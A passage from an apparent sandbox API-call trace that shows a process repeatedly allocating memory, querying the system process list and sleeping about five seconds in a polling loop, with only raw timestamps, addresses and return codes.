returned 0x0 [0219.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.075] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.084] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.093] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.103] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.110] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.118] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.124] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.125] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.156] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.163] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.170] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.177] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.183] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.189] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.190] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.196] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.203] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.213] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.220] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.222] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.229] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.230] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.237] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.244] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.252] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 